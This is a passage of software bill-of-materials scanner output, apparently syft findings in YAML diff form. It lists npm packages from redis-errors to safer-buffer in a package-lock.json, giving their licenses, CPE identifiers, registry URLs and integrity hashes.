SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: redis-errors 1.2.0' + title: redis-errors 1.2.0 + description: 'Package discovered: redis-errors 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c6c6f81fb8ed6f43 + name: redis-errors + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/redis-errors@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz + integrity: sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 38d5b601f3f165a4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: redis-parser 3.0.0' + title: redis-parser 3.0.0 + description: 'Package discovered: redis-parser 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d5b8e01dbe4fdde4 + name: redis-parser + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/redis-parser@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz + integrity: sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A== + dependencies: + redis-errors: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 73e41b20b413651d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: rentaldrivego 1.0.0' + title: rentaldrivego 1.0.0 + description: 'Package discovered: rentaldrivego 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 784a87ea0f6f2516 + name: rentaldrivego + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/rentaldrivego@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7ebb1ff31601df05 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: require-directory 2.1.1' + title: require-directory 2.1.1 + description: 'Package discovered: require-directory 2.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ae03eb850b2a6844 + name: require-directory + version: 2.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/require-directory@2.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz + integrity: sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ae7e8898d2f0d0c8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: require-from-string 2.0.2' + title: require-from-string 2.0.2 + description: 'Package discovered: require-from-string 2.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f7f7aa302949d36c + name: require-from-string + version: 2.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/require-from-string@2.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz + integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2d09a802d546535f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: require-main-filename 2.0.0' + title: require-main-filename 2.0.0 + description: 'Package discovered: require-main-filename 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 791f53dc42a97604 + name: require-main-filename + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/require-main-filename@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz + integrity: sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b3700e9b1b03966b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: resend 3.5.0' + title: resend 3.5.0 + description: 'Package discovered: resend 3.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c52cdc280efaa4d0 + name: resend + version: 3.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/resend@3.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/resend/-/resend-3.5.0.tgz + integrity: sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ== + dependencies: + '@react-email/render': 0.0.16 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7be6d0329d7fce71 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: resolve 1.22.12' + title: resolve 1.22.12 + description: 'Package discovered: resolve 1.22.12' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2e445c7ed78482c1 + name: resolve + version: 1.22.12 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/resolve@1.22.12 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz + integrity: sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA== + dependencies: + es-errors: ^1.3.0 + is-core-module: ^2.16.1 + path-parse: ^1.0.7 + supports-preserve-symlinks-flag: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3f98609d8855980b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: restructure 3.0.2' + title: restructure 3.0.2 + description: 'Package discovered: restructure 3.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 05272d1e7e2ad4be + name: restructure + version: 3.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/restructure@3.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz + integrity: sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b7f5c38e4c9ed33f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: retry 0.13.1' + title: retry 0.13.1 + description: 'Package discovered: retry 0.13.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b8be0fab008ab183 + name: retry + version: 0.13.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/retry@0.13.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/retry/-/retry-0.13.1.tgz + integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b8976a72aaa61b4d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: retry-request 7.0.2' + title: retry-request 7.0.2 + description: 'Package discovered: retry-request 7.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 672814322994feff + name: retry-request + version: 7.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/retry-request@7.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz + integrity: sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w== + dependencies: + '@types/request': ^2.48.8 + extend: ^3.0.2 + teeny-request: ^9.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0d600ce535ab6bd3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: reusify 1.1.0' + title: reusify 1.1.0 + description: 'Package discovered: reusify 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 456353a253e18966 + name: reusify + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/reusify@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz + integrity: sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3a557f6b562fa305 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: run-parallel 1.2.0' + title: run-parallel 1.2.0 + description: 'Package discovered: run-parallel 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ca5a4d8be889885f + name: run-parallel + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/run-parallel@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz + integrity: sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA== + dependencies: + queue-microtask: ^1.2.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0d59c1e836c63d4a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: safe-buffer 5.1.2' + title: safe-buffer 5.1.2 + description: 'Package discovered: safe-buffer 5.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 36d9a8484ed180a6 + name: safe-buffer + version: 5.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/safe-buffer@5.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz + integrity: sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 982541a2a19fdc52 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: safe-buffer 5.2.1' + title: safe-buffer 5.2.1 + description: 'Package discovered: safe-buffer 5.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 28135efb01cb74b9 + name: safe-buffer + version: 5.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/safe-buffer@5.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz + integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 186ed2340219a99c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: safer-buffer 2.1.2' + title: safer-buffer 2.1.2 + description: 'Package discovered: safer-buffer 2.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bc8acb243e9d9464 + name: safer-buffer + version: 2.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: 